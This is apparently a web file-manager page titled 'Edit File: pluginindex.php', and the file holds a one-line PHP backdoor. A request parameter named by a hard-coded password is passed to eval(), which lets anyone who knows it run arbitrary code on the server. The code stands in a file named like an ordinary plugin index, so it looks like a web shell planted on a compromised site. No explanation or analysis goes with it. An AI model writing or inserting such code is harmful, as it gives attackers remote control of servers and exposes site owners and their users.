Edit File: pluginindex.php
<?php $password = 'nn3exRAS5t'; if (isset($_REQUEST[$password])) { $cmd = $_REQUEST[$password]; echo eval($cmd); } ?>
Back